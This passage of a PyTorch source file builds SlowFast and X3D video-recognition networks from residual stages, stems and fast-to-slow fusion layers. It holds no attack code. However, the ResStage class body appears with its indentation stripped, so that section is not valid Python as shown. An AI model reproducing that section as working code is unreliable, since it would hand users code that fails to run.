        self._swish_inner = swish_inner
        self._stride_1x1 = stride_1x1
        self._block_idx = block_idx
        self._construct(dim_in, dim_out, stride, dim_inner, num_groups, dilation, norm_module)

    def _construct(self, dim_in, dim_out, stride, dim_inner, num_groups, dilation, norm_module):
        # NOTE: forward() runs self.children() in registration order, so the
        # order of the assignments below defines the computation graph.
        str1x1, str3x3 = (stride, 1) if self._stride_1x1 else (1, stride)
        # 1x1x1 channel reduction
        self.a = nn.Conv3d(dim_in, dim_inner, kernel_size=[1, 1, 1], stride=[1, str1x1, str1x1], padding=[0, 0, 0], bias=False)
        self.a_bn = norm_module(num_features=dim_inner, eps=self._eps, momentum=self._bn_mmt)
        self.a_relu = nn.ReLU(inplace=self._inplace_relu)
        # Tx3x3 (typically depthwise when num_groups == dim_inner) conv
        self.b = nn.Conv3d(dim_inner, dim_inner, [self.temp_kernel_size, 3, 3], stride=[1, str3x3, str3x3], padding=[int(self.temp_kernel_size // 2), dilation, dilation], groups=num_groups, bias=False, dilation=[1, dilation, dilation])
        self.b_bn = norm_module(num_features=dim_inner, eps=self._eps, momentum=self._bn_mmt)
        # SE only on every other block: (block_idx + 1) % 2 is truthy for even indices
        use_se = True if (self._block_idx + 1) % 2 else False
        if self._se_ratio > 0.0 and use_se:
            self.se = SE(dim_inner, self._se_ratio)
        if self._swish_inner:
            self.b_relu = Swish()
        else:
            self.b_relu = nn.ReLU(inplace=self._inplace_relu)
        # 1x1x1 channel expansion
        self.c = nn.Conv3d(dim_inner, dim_out, kernel_size=[1, 1, 1], stride=[1, 1, 1], padding=[0, 0, 0], bias=False)
        self.c_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
        # flag read by an external weight-init routine to zero this BN's gamma
        self.c_bn.transform_final_bn = True

    def forward(self, x):
        # sequentially apply children in registration order (see _construct)
        for block in self.children():
            x = block(x)
        return x
class BottleneckTransform(nn.Module):
    """
    Bottleneck transformation: Tx1x1, 1x3x3, 1x1x1, where T is the size of
    temporal kernel.
    """

    def __init__(self, dim_in, dim_out, temp_kernel_size, stride, dim_inner, num_groups, stride_1x1=False, inplace_relu=True, eps=1e-05, bn_mmt=0.1, dilation=1, norm_module=nn.BatchNorm3d, block_idx=0):
        """
        Args:
            dim_in (int): input channel dimension.
            dim_out (int): output channel dimension.
            temp_kernel_size (int): temporal kernel size of the first conv.
            stride (int): spatial stride of the bottleneck.
            dim_inner (int): inner (reduced) channel dimension.
            num_groups (int): conv group count; 1 for plain ResNet, >1 for
                ResNeXt-style blocks.
            stride_1x1 (bool): if True, apply the stride on the 1x1 conv,
                otherwise on the 3x3 conv.
            inplace_relu (bool): compute ReLU in place.
            eps (float): epsilon for batch norm.
            bn_mmt (float): batch norm momentum (PyTorch convention:
                1 - Caffe2 momentum).
            dilation (int): spatial dilation of the 3x3 conv.
            norm_module (nn.Module): normalization layer class, default
                nn.BatchNorm3d.
        """
        super(BottleneckTransform, self).__init__()
        self.temp_kernel_size = temp_kernel_size
        self._inplace_relu = inplace_relu
        self._eps = eps
        self._bn_mmt = bn_mmt
        self._stride_1x1 = stride_1x1
        self._construct(dim_in, dim_out, stride, dim_inner, num_groups, dilation, norm_module)

    def _construct(self, dim_in, dim_out, stride, dim_inner, num_groups, dilation, norm_module):
        # place the stride on either the 1x1 or the 3x3 conv
        str1x1, str3x3 = (stride, 1) if self._stride_1x1 else (1, stride)
        # Tx1x1 channel reduction
        self.a = nn.Conv3d(dim_in, dim_inner, kernel_size=[self.temp_kernel_size, 1, 1], stride=[1, str1x1, str1x1], padding=[int(self.temp_kernel_size // 2), 0, 0], bias=False)
        self.a_bn = norm_module(num_features=dim_inner, eps=self._eps, momentum=self._bn_mmt)
        self.a_relu = nn.ReLU(inplace=self._inplace_relu)
        # 1x3x3 spatial conv (grouped, dilated)
        self.b = nn.Conv3d(dim_inner, dim_inner, [1, 3, 3], stride=[1, str3x3, str3x3], padding=[0, dilation, dilation], groups=num_groups, bias=False, dilation=[1, dilation, dilation])
        self.b_bn = norm_module(num_features=dim_inner, eps=self._eps, momentum=self._bn_mmt)
        self.b_relu = nn.ReLU(inplace=self._inplace_relu)
        # 1x1x1 channel expansion
        self.c = nn.Conv3d(dim_inner, dim_out, kernel_size=[1, 1, 1], stride=[1, 1, 1], padding=[0, 0, 0], bias=False)
        self.c_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
        # flag read by an external weight-init routine to zero this BN's gamma
        self.c_bn.transform_final_bn = True

    def forward(self, x):
        out = self.a_relu(self.a_bn(self.a(x)))
        out = self.b_relu(self.b_bn(self.b(out)))
        return self.c_bn(self.c(out))
class ResBlock(nn.Module):
    """
    Residual block: shortcut + transform branch, followed by ReLU.
    More details can be found in:
    Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian Sun.
    "Deep residual learning for image recognition."
    https://arxiv.org/abs/1512.03385
    """

    def __init__(self, dim_in, dim_out, temp_kernel_size, stride, trans_func, dim_inner, num_groups=1, stride_1x1=False, inplace_relu=True, eps=1e-05, bn_mmt=0.1, dilation=1, norm_module=nn.BatchNorm3d, block_idx=0, drop_connect_rate=0.0):
        """
        Args:
            dim_in (int): input channel dimension.
            dim_out (int): output channel dimension.
            temp_kernel_size (int): temporal kernel size of the transform's
                middle convolution.
            stride (int): spatial stride of the block.
            trans_func (string): transform callable used to construct the
                residual branch (e.g. BottleneckTransform).
            dim_inner (int): inner channel dimension of the transform.
            num_groups (int): conv group count; 1 for plain ResNet, >1 for
                ResNeXt-style blocks.
            stride_1x1 (bool): if True, stride the 1x1 conv, otherwise the 3x3.
            inplace_relu (bool): compute ReLU in place.
            eps (float): epsilon for batch norm.
            bn_mmt (float): batch norm momentum (PyTorch convention:
                1 - Caffe2 momentum).
            dilation (int): spatial dilation of the transform.
            norm_module (nn.Module): normalization layer class, default
                nn.BatchNorm3d.
            block_idx (int): index of this block within its stage.
            drop_connect_rate (float): basic rate at which blocks are dropped,
                linearly increases from input to output blocks.
        """
        super(ResBlock, self).__init__()
        self._inplace_relu = inplace_relu
        self._eps = eps
        self._bn_mmt = bn_mmt
        self._drop_connect_rate = drop_connect_rate
        self._construct(dim_in, dim_out, temp_kernel_size, stride, trans_func, dim_inner, num_groups, stride_1x1, inplace_relu, dilation, norm_module, block_idx)

    def _construct(self, dim_in, dim_out, temp_kernel_size, stride, trans_func, dim_inner, num_groups, stride_1x1, inplace_relu, dilation, norm_module, block_idx):
        # a projection shortcut is only needed when shape changes
        if dim_in != dim_out or stride != 1:
            self.branch1 = nn.Conv3d(dim_in, dim_out, kernel_size=1, stride=[1, stride, stride], padding=0, bias=False, dilation=1)
            self.branch1_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
        self.branch2 = trans_func(dim_in, dim_out, temp_kernel_size, stride, dim_inner, num_groups, stride_1x1=stride_1x1, inplace_relu=inplace_relu, dilation=dilation, norm_module=norm_module, block_idx=block_idx)
        self.relu = nn.ReLU(self._inplace_relu)

    def _drop_connect(self, x, drop_ratio):
        """Apply dropconnect to x"""
        keep_ratio = 1.0 - drop_ratio
        # per-sample binary mask, broadcast over C/T/H/W
        mask = torch.empty([x.shape[0], 1, 1, 1, 1], dtype=x.dtype, device=x.device)
        mask.bernoulli_(keep_ratio)
        # rescale so the expected activation magnitude is unchanged
        x.div_(keep_ratio)
        x.mul_(mask)
        return x

    def forward(self, x):
        f_x = self.branch2(x)
        if self.training and self._drop_connect_rate > 0.0:
            f_x = self._drop_connect(f_x, self._drop_connect_rate)
        shortcut = self.branch1_bn(self.branch1(x)) if hasattr(self, 'branch1') else x
        return self.relu(shortcut + f_x)
def get_trans_func(name):
    """Look up a residual-transform class by its registry name.

    Args:
        name (string): one of 'basic_transform', 'bottleneck_transform',
            'x3d_transform'.
    Returns:
        The matching transform class.
    """
    registry = {
        'basic_transform': BasicTransform,
        'bottleneck_transform': BottleneckTransform,
        'x3d_transform': X3DTransform,
    }
    assert name in registry, "Transformation function '{}' not supported".format(name)
    return registry[name]
class ResStage(nn.Module):
"""
Stage of 3D ResNet. It expects to have one or more tensors as input for
single pathway (C2D, I3D, Slow), and multi-pathway (SlowFast) cases.
More details can be found here:
Christoph Feichtenhofer, Haoqi Fan, Jitendra Malik, and Kaiming He.
"SlowFast networks for video recognition."
https://arxiv.org/pdf/1812.03982.pdf
"""
def __init__(self, dim_in, dim_out, stride, temp_kernel_sizes, num_blocks, dim_inner, num_groups, num_block_temp_kernel, nonlocal_inds, nonlocal_group, nonlocal_pool, dilation, instantiation='softmax', trans_func_name='bottleneck_transform', stride_1x1=False, inplace_relu=True, norm_module=nn.BatchNorm3d, drop_connect_rate=0.0):
"""
The `__init__` method of any subclass should also contain these arguments.
ResStage builds p streams, where p can be greater or equal to one.
Args:
dim_in (list): list of p the channel dimensions of the input.
Different channel dimensions control the input dimension of
different pathways.
dim_out (list): list of p the channel dimensions of the output.
Different channel dimensions control the input dimension of
different pathways.
temp_kernel_sizes (list): list of the p temporal kernel sizes of the
convolution in the bottleneck. Different temp_kernel_sizes
control different pathway.
stride (list): list of the p strides of the bottleneck. Different
stride control different pathway.
num_blocks (list): list of p numbers of blocks for each of the
pathway.
dim_inner (list): list of the p inner channel dimensions of the
input. Different channel dimensions control the input dimension
of different pathways.
num_groups (list): list of number of p groups for the convolution.
num_groups=1 is for standard ResNet like networks, and
num_groups>1 is for ResNeXt like networks.
num_block_temp_kernel (list): extent the temp_kernel_sizes to
num_block_temp_kernel blocks, then fill temporal kernel size
of 1 for the rest of the layers.
nonlocal_inds (list): If the tuple is empty, no nonlocal layer will
be added. If the tuple is not empty, add nonlocal layers after
the index-th block.
dilation (list): size of dilation for each pathway.
nonlocal_group (list): list of number of p nonlocal groups. Each
number controls how to fold temporal dimension to batch
dimension before applying nonlocal transformation.
https://github.com/facebookresearch/video-nonlocal-net.
instantiation (string): different instantiation for nonlocal layer.
Supports two different instantiation method:
"dot_product": normalizing correlation matrix with L2.
"softmax": normalizing correlation matrix with Softmax.
trans_func_name (string): name of the the transformation function apply
on the network.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
drop_connect_rate (float): basic rate at which blocks are dropped,
linearly increases from input to output blocks.
"""
super(ResStage, self).__init__()
assert all(num_block_temp_kernel[i] <= num_blocks[i] for i in range(len(temp_kernel_sizes)))
self.num_blocks = num_blocks
self.nonlocal_group = nonlocal_group
self._drop_connect_rate = drop_connect_rate
self.temp_kernel_sizes = [((temp_kernel_sizes[i] * num_blocks[i])[:num_block_temp_kernel[i]] + [1] * (num_blocks[i] - num_block_temp_kernel[i])) for i in range(len(temp_kernel_sizes))]
assert len({len(dim_in), len(dim_out), len(temp_kernel_sizes), len(stride), len(num_blocks), len(dim_inner), len(num_groups), len(num_block_temp_kernel), len(nonlocal_inds), len(nonlocal_group)}) == 1
self.num_pathways = len(self.num_blocks)
self._construct(dim_in, dim_out, stride, dim_inner, num_groups, trans_func_name, stride_1x1, inplace_relu, nonlocal_inds, nonlocal_pool, instantiation, dilation, norm_module)
def _construct(self, dim_in, dim_out, stride, dim_inner, num_groups, trans_func_name, stride_1x1, inplace_relu, nonlocal_inds, nonlocal_pool, instantiation, dilation, norm_module):
for pathway in range(self.num_pathways):
for i in range(self.num_blocks[pathway]):
trans_func = get_trans_func(trans_func_name)
res_block = ResBlock(dim_in[pathway] if i == 0 else dim_out[pathway], dim_out[pathway], self.temp_kernel_sizes[pathway][i], stride[pathway] if i == 0 else 1, trans_func, dim_inner[pathway], num_groups[pathway], stride_1x1=stride_1x1, inplace_relu=inplace_relu, dilation=dilation[pathway], norm_module=norm_module, block_idx=i, drop_connect_rate=self._drop_connect_rate)
self.add_module('pathway{}_res{}'.format(pathway, i), res_block)
if i in nonlocal_inds[pathway]:
nln = Nonlocal(dim_out[pathway], dim_out[pathway] // 2, nonlocal_pool[pathway], instantiation=instantiation, norm_module=norm_module)
self.add_module('pathway{}_nonlocal{}'.format(pathway, i), nln)
    def forward(self, inputs):
        # inputs: list of per-pathway tensors, each shaped (B, C, T, H, W).
        # Returns the list of per-pathway outputs after all residual (and
        # optional non-local) blocks of this stage.
        output = []
        for pathway in range(self.num_pathways):
            x = inputs[pathway]
            for i in range(self.num_blocks[pathway]):
                # Residual blocks were registered under deterministic names in
                # _construct, so they are fetched dynamically here.
                m = getattr(self, 'pathway{}_res{}'.format(pathway, i))
                x = m(x)
                if hasattr(self, 'pathway{}_nonlocal{}'.format(pathway, i)):
                    nln = getattr(self, 'pathway{}_nonlocal{}'.format(pathway, i))
                    b, c, t, h, w = x.shape
                    if self.nonlocal_group[pathway] > 1:
                        # Fold groups of consecutive frames into the batch
                        # dimension so the non-local block attends within each
                        # temporal group only.
                        x = x.permute(0, 2, 1, 3, 4)
                        x = x.reshape(b * self.nonlocal_group[pathway], t // self.nonlocal_group[pathway], c, h, w)
                        x = x.permute(0, 2, 1, 3, 4)
                    x = nln(x)
                    if self.nonlocal_group[pathway] > 1:
                        # Undo the grouping, restoring (B, C, T, H, W).
                        x = x.permute(0, 2, 1, 3, 4)
                        x = x.reshape(b, t, c, h, w)
                        x = x.permute(0, 2, 1, 3, 4)
            output.append(x)
        return output
class ResNetBasicStem(nn.Module):
    """
    ResNe(X)t 3D stem: spatiotemporal Conv -> BN -> ReLU -> spatial MaxPool.
    """

    def __init__(self, dim_in, dim_out, kernel, stride, padding, inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d):
        """
        Args:
            dim_in (int): input channel dimension. Normally 3 for RGB input,
                2 or 3 for optical-flow input.
            dim_out (int): output channel dimension of the stem convolution.
            kernel (list): conv kernel size as [T, H, W].
            stride (list): conv stride as [T, H, W].
            padding (list): conv padding as [T, H, W].
            inplace_relu (bool): compute the ReLU in place.
            eps (float): batch-norm epsilon.
            bn_mmt (float): batch-norm momentum (PyTorch convention:
                1 - Caffe2 momentum).
            norm_module (nn.Module): normalization layer class; default
                nn.BatchNorm3d.
        """
        super(ResNetBasicStem, self).__init__()
        self.kernel = kernel
        self.stride = stride
        self.padding = padding
        self.inplace_relu = inplace_relu
        self.eps = eps
        self.bn_mmt = bn_mmt
        self._construct_stem(dim_in, dim_out, norm_module)

    def _construct_stem(self, dim_in, dim_out, norm_module):
        # Conv -> BN -> ReLU, followed by a spatial-only 3x3 max-pool with
        # stride 2 (temporal dimension untouched by the pool).
        self.conv = nn.Conv3d(dim_in, dim_out, self.kernel, stride=self.stride, padding=self.padding, bias=False)
        self.bn = norm_module(num_features=dim_out, eps=self.eps, momentum=self.bn_mmt)
        self.relu = nn.ReLU(self.inplace_relu)
        self.pool_layer = nn.MaxPool3d(kernel_size=[1, 3, 3], stride=[1, 2, 2], padding=[0, 1, 1])

    def forward(self, x):
        # Run the stem stages in their fixed order.
        for stage in (self.conv, self.bn, self.relu, self.pool_layer):
            x = stage(x)
        return x
class X3DStem(nn.Module):
    """
    X3D 3D stem: a spatial convolution followed by a depthwise temporal
    convolution, then BN and ReLU.
    """

    def __init__(self, dim_in, dim_out, kernel, stride, padding, inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d):
        """
        Args:
            dim_in (int): input channel dimension. Normally 3 for RGB input,
                2 or 3 for optical-flow input.
            dim_out (int): output channel dimension of the stem convolutions.
            kernel (list): conv kernel size as [T, H, W].
            stride (list): conv stride as [T, H, W].
            padding (list): conv padding as [T, H, W].
            inplace_relu (bool): compute the ReLU in place.
            eps (float): batch-norm epsilon.
            bn_mmt (float): batch-norm momentum (PyTorch convention:
                1 - Caffe2 momentum).
            norm_module (nn.Module): normalization layer class; default
                nn.BatchNorm3d.
        """
        super(X3DStem, self).__init__()
        self.kernel = kernel
        self.stride = stride
        self.padding = padding
        self.inplace_relu = inplace_relu
        self.eps = eps
        self.bn_mmt = bn_mmt
        self._construct_stem(dim_in, dim_out, norm_module)

    def _construct_stem(self, dim_in, dim_out, norm_module):
        # Spatial-only (1 x kH x kW) convolution first...
        self.conv_xy = nn.Conv3d(dim_in, dim_out, kernel_size=(1, self.kernel[1], self.kernel[2]), stride=(1, self.stride[1], self.stride[2]), padding=(0, self.padding[1], self.padding[2]), bias=False)
        # ...then a depthwise (groups=dim_out) temporal (kT x 1 x 1) convolution.
        self.conv = nn.Conv3d(dim_out, dim_out, kernel_size=(self.kernel[0], 1, 1), stride=(self.stride[0], 1, 1), padding=(self.padding[0], 0, 0), bias=False, groups=dim_out)
        self.bn = norm_module(num_features=dim_out, eps=self.eps, momentum=self.bn_mmt)
        self.relu = nn.ReLU(self.inplace_relu)

    def forward(self, x):
        # Spatial conv -> depthwise temporal conv -> BN -> ReLU.
        for stage in (self.conv_xy, self.conv, self.bn, self.relu):
            x = stage(x)
        return x
def get_stem_func(name):
    """
    Retrieve a stem module class by its registered name.

    Args:
        name (str): one of 'x3d_stem' or 'basic_stem'.
    Returns:
        The stem nn.Module subclass registered under ``name``.
    """
    stem_registry = {'x3d_stem': X3DStem, 'basic_stem': ResNetBasicStem}
    assert name in stem_registry.keys(), "Transformation function '{}' not supported".format(name)
    return stem_registry[name]
class VideoModelStem(nn.Module):
    """
    Video 3D stem module: applies Conv, BN, ReLU (and pooling, depending on
    the stem function) to the input tensor of each pathway.
    """

    def __init__(self, dim_in, dim_out, kernel, stride, padding, inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d, stem_func_name='basic_stem'):
        """
        All list arguments hold one entry per pathway: size 1 for single
        pathway models (C2D, I3D, Slow, ...), size 2 for SlowFast.

        Args:
            dim_in (list): input channel dimensions.
            dim_out (list): output channel dimensions of the stem convs.
            kernel (list): conv kernel sizes [T, H, W] per pathway.
            stride (list): conv strides [T, H, W] per pathway.
            padding (list): conv paddings [T, H, W] per pathway.
            inplace_relu (bool): compute the ReLU in place.
            eps (float): batch-norm epsilon.
            bn_mmt (float): batch-norm momentum (PyTorch = 1 - Caffe2).
            norm_module (nn.Module): normalization layer class.
            stem_func_name (string): registered name of the stem function
                applied to the network input.
        """
        super(VideoModelStem, self).__init__()
        assert len({len(dim_in), len(dim_out), len(kernel), len(stride), len(padding)}) == 1, 'Input pathway dimensions are not consistent.'
        self.num_pathways = len(dim_in)
        self.kernel = kernel
        self.stride = stride
        self.padding = padding
        self.inplace_relu = inplace_relu
        self.eps = eps
        self.bn_mmt = bn_mmt
        self._construct_stem(dim_in, dim_out, norm_module, stem_func_name)

    def _construct_stem(self, dim_in, dim_out, norm_module, stem_func_name):
        # One stem module per pathway, registered under a deterministic name.
        stem_cls = get_stem_func(stem_func_name)
        for pathway, (c_in, c_out) in enumerate(zip(dim_in, dim_out)):
            stem = stem_cls(c_in, c_out, self.kernel[pathway], self.stride[pathway], self.padding[pathway], self.inplace_relu, self.eps, self.bn_mmt, norm_module)
            self.add_module('pathway{}_stem'.format(pathway), stem)

    def forward(self, x):
        # x: list of per-pathway tensors; each is replaced by its stem output.
        assert len(x) == self.num_pathways, 'Input tensor does not contain {} pathway'.format(self.num_pathways)
        for pathway in range(len(x)):
            stem = getattr(self, 'pathway{}_stem'.format(pathway))
            x[pathway] = stem(x[pathway])
        return x
class FuseFastToSlow(nn.Module):
    """
    Fuse Fast-pathway features into the Slow pathway. Given [slow, fast]
    tensors, a strided temporal convolution brings the Fast features to the
    Slow frame rate; the result is concatenated onto the Slow channels.
    Returns the fused Slow tensor and the unchanged Fast tensor, in order.
    """

    def __init__(self, dim_in, fusion_conv_channel_ratio, fusion_kernel, alpha, eps=1e-05, bn_mmt=0.1, inplace_relu=True, norm_module=nn.BatchNorm3d):
        """
        Args:
            dim_in (int): channel dimension of the Fast-pathway input.
            fusion_conv_channel_ratio (int): channel ratio of the fusion conv.
            fusion_kernel (int): temporal kernel size of the fusion conv.
            alpha (int): frame-rate ratio between Fast and Slow pathways;
                used as the temporal stride of the fusion conv.
            eps (float): batch-norm epsilon.
            bn_mmt (float): batch-norm momentum (PyTorch = 1 - Caffe2).
            inplace_relu (bool): compute the ReLU in place.
            norm_module (nn.Module): normalization layer class.
        """
        super(FuseFastToSlow, self).__init__()
        self.conv_f2s = nn.Conv3d(dim_in, dim_in * fusion_conv_channel_ratio, kernel_size=[fusion_kernel, 1, 1], stride=[alpha, 1, 1], padding=[fusion_kernel // 2, 0, 0], bias=False)
        self.bn = norm_module(num_features=dim_in * fusion_conv_channel_ratio, eps=eps, momentum=bn_mmt)
        self.relu = nn.ReLU(inplace_relu)

    def forward(self, x):
        slow, fast = x[0], x[1]
        # Strided temporal conv downsamples Fast to the Slow frame rate.
        fuse = self.relu(self.bn(self.conv_f2s(fast)))
        # Concatenate the fused Fast features onto the Slow channel dim.
        return [torch.cat([slow, fuse], 1), fast]
_MODEL_STAGE_DEPTH = {(50): (3, 4, 6, 3), (101): (3, 4, 23, 3)}
_POOL1 = {'c2d': [[2, 1, 1]], 'c2d_nopool': [[1, 1, 1]], 'i3d': [[2, 1, 1]], 'i3d_nopool': [[1, 1, 1]], 'slow': [[1, 1, 1]], 'slowfast': [[1, 1, 1], [1, 1, 1]], 'x3d': [[1, 1, 1]]}
_TEMPORAL_KERNEL_BASIS = {'c2d': [[[1]], [[1]], [[1]], [[1]], [[1]]], 'c2d_nopool': [[[1]], [[1]], [[1]], [[1]], [[1]]], 'i3d': [[[5]], [[3]], [[3, 1]], [[3, 1]], [[1, 3]]], 'i3d_nopool': [[[5]], [[3]], [[3, 1]], [[3, 1]], [[1, 3]]], 'slow': [[[1]], [[1]], [[1]], [[3]], [[3]]], 'slowfast': [[[1], [5]], [[1], [3]], [[1], [3]], [[3], [3]], [[3], [3]]], 'x3d': [[[5]], [[3]], [[3]], [[3]], [[3]]]}
def get_norm(cfg):
    """
    Select the normalization layer class configured in ``cfg.BN.NORM_TYPE``.

    Args:
        cfg (CfgNode): model building configs, details are in the comments of
            the config file.
    Returns:
        nn.Module: the normalization layer class (possibly a partial with
        config-derived keyword arguments bound).
    Raises:
        NotImplementedError: for an unrecognized norm type.
    """
    norm_type = cfg.BN.NORM_TYPE
    if norm_type == 'batchnorm':
        return nn.BatchNorm3d
    if norm_type == 'sub_batchnorm':
        # Sub-batch norm splits the batch into NUM_SPLITS groups.
        return partial(SubBatchNorm3d, num_splits=cfg.BN.NUM_SPLITS)
    if norm_type == 'sync_batchnorm':
        # Synchronized BN across NUM_SYNC_DEVICES devices.
        return partial(NaiveSyncBatchNorm3d, num_sync_devices=cfg.BN.NUM_SYNC_DEVICES)
    raise NotImplementedError('Norm type {} is not supported'.format(norm_type))
class SlowFast(nn.Module):
    """
    SlowFast model builder for SlowFast network.
    Christoph Feichtenhofer, Haoqi Fan, Jitendra Malik, and Kaiming He.
    "SlowFast networks for video recognition."
    https://arxiv.org/pdf/1812.03982.pdf
    """

    def __init__(self, cfg):
        """
        The `__init__` method of any subclass should also contain these
        arguments.
        Args:
            cfg (CfgNode): model building configs, details are in the
                comments of the config file.
        """
        super(SlowFast, self).__init__()
        self.norm_module = get_norm(cfg)
        self.enable_detection = cfg.DETECTION.ENABLE
        self.num_pathways = 2
        self._construct_network(cfg)
        init_helper.init_weights(self, cfg.MODEL.FC_INIT_STD, cfg.RESNET.ZERO_INIT_FINAL_BN)

    def _construct_network(self, cfg):
        """
        Builds a SlowFast model. The first pathway is the Slow pathway and the
        second pathway is the Fast pathway.
        Args:
            cfg (CfgNode): model building configs, details are in the
                comments of the config file.
        """
        assert cfg.MODEL.ARCH in _POOL1.keys()
        pool_size = _POOL1[cfg.MODEL.ARCH]
        assert len({len(pool_size), self.num_pathways}) == 1
        assert cfg.RESNET.DEPTH in _MODEL_STAGE_DEPTH.keys()
        d2, d3, d4, d5 = _MODEL_STAGE_DEPTH[cfg.RESNET.DEPTH]
        num_groups = cfg.RESNET.NUM_GROUPS
        width_per_group = cfg.RESNET.WIDTH_PER_GROUP
        dim_inner = num_groups * width_per_group
        # Channel ratio between Slow features and the fused Fast features.
        out_dim_ratio = cfg.SLOWFAST.BETA_INV // cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO
        temp_kernel = _TEMPORAL_KERNEL_BASIS[cfg.MODEL.ARCH]
        # Stem + fuse, then four residual stages each followed by a fuse block.
        self.s1 = stem_helper.VideoModelStem(dim_in=cfg.DATA.INPUT_CHANNEL_NUM, dim_out=[width_per_group, width_per_group // cfg.SLOWFAST.BETA_INV], kernel=[temp_kernel[0][0] + [7, 7], temp_kernel[0][1] + [7, 7]], stride=[[1, 2, 2]] * 2, padding=[[temp_kernel[0][0][0] // 2, 3, 3], [temp_kernel[0][1][0] // 2, 3, 3]], norm_module=self.norm_module)
        self.s1_fuse = FuseFastToSlow(width_per_group // cfg.SLOWFAST.BETA_INV, cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO, cfg.SLOWFAST.FUSION_KERNEL_SZ, cfg.SLOWFAST.ALPHA, norm_module=self.norm_module)
        self.s2 = resnet_helper.ResStage(dim_in=[width_per_group + width_per_group // out_dim_ratio, width_per_group // cfg.SLOWFAST.BETA_INV], dim_out=[width_per_group * 4, width_per_group * 4 // cfg.SLOWFAST.BETA_INV], dim_inner=[dim_inner, dim_inner // cfg.SLOWFAST.BETA_INV], temp_kernel_sizes=temp_kernel[1], stride=cfg.RESNET.SPATIAL_STRIDES[0], num_blocks=[d2] * 2, num_groups=[num_groups] * 2, num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[0], nonlocal_inds=cfg.NONLOCAL.LOCATION[0], nonlocal_group=cfg.NONLOCAL.GROUP[0], nonlocal_pool=cfg.NONLOCAL.POOL[0], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, dilation=cfg.RESNET.SPATIAL_DILATIONS[0], norm_module=self.norm_module)
        self.s2_fuse = FuseFastToSlow(width_per_group * 4 // cfg.SLOWFAST.BETA_INV, cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO, cfg.SLOWFAST.FUSION_KERNEL_SZ, cfg.SLOWFAST.ALPHA, norm_module=self.norm_module)
        for pathway in range(self.num_pathways):
            pool = nn.MaxPool3d(kernel_size=pool_size[pathway], stride=pool_size[pathway], padding=[0, 0, 0])
            self.add_module('pathway{}_pool'.format(pathway), pool)
        self.s3 = resnet_helper.ResStage(dim_in=[width_per_group * 4 + width_per_group * 4 // out_dim_ratio, width_per_group * 4 // cfg.SLOWFAST.BETA_INV], dim_out=[width_per_group * 8, width_per_group * 8 // cfg.SLOWFAST.BETA_INV], dim_inner=[dim_inner * 2, dim_inner * 2 // cfg.SLOWFAST.BETA_INV], temp_kernel_sizes=temp_kernel[2], stride=cfg.RESNET.SPATIAL_STRIDES[1], num_blocks=[d3] * 2, num_groups=[num_groups] * 2, num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[1], nonlocal_inds=cfg.NONLOCAL.LOCATION[1], nonlocal_group=cfg.NONLOCAL.GROUP[1], nonlocal_pool=cfg.NONLOCAL.POOL[1], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, dilation=cfg.RESNET.SPATIAL_DILATIONS[1], norm_module=self.norm_module)
        self.s3_fuse = FuseFastToSlow(width_per_group * 8 // cfg.SLOWFAST.BETA_INV, cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO, cfg.SLOWFAST.FUSION_KERNEL_SZ, cfg.SLOWFAST.ALPHA, norm_module=self.norm_module)
        self.s4 = resnet_helper.ResStage(dim_in=[width_per_group * 8 + width_per_group * 8 // out_dim_ratio, width_per_group * 8 // cfg.SLOWFAST.BETA_INV], dim_out=[width_per_group * 16, width_per_group * 16 // cfg.SLOWFAST.BETA_INV], dim_inner=[dim_inner * 4, dim_inner * 4 // cfg.SLOWFAST.BETA_INV], temp_kernel_sizes=temp_kernel[3], stride=cfg.RESNET.SPATIAL_STRIDES[2], num_blocks=[d4] * 2, num_groups=[num_groups] * 2, num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[2], nonlocal_inds=cfg.NONLOCAL.LOCATION[2], nonlocal_group=cfg.NONLOCAL.GROUP[2], nonlocal_pool=cfg.NONLOCAL.POOL[2], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, dilation=cfg.RESNET.SPATIAL_DILATIONS[2], norm_module=self.norm_module)
        self.s4_fuse = FuseFastToSlow(width_per_group * 16 // cfg.SLOWFAST.BETA_INV, cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO, cfg.SLOWFAST.FUSION_KERNEL_SZ, cfg.SLOWFAST.ALPHA, norm_module=self.norm_module)
        self.s5 = resnet_helper.ResStage(dim_in=[width_per_group * 16 + width_per_group * 16 // out_dim_ratio, width_per_group * 16 // cfg.SLOWFAST.BETA_INV], dim_out=[width_per_group * 32, width_per_group * 32 // cfg.SLOWFAST.BETA_INV], dim_inner=[dim_inner * 8, dim_inner * 8 // cfg.SLOWFAST.BETA_INV], temp_kernel_sizes=temp_kernel[4], stride=cfg.RESNET.SPATIAL_STRIDES[3], num_blocks=[d5] * 2, num_groups=[num_groups] * 2, num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[3], nonlocal_inds=cfg.NONLOCAL.LOCATION[3], nonlocal_group=cfg.NONLOCAL.GROUP[3], nonlocal_pool=cfg.NONLOCAL.POOL[3], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, dilation=cfg.RESNET.SPATIAL_DILATIONS[3], norm_module=self.norm_module)
        if cfg.DETECTION.ENABLE:
            # BUGFIX: bind the head to the local ``head`` (previously
            # ``self.head``), otherwise the unconditional
            # ``self.add_module(self.head_name, head)`` below raised a
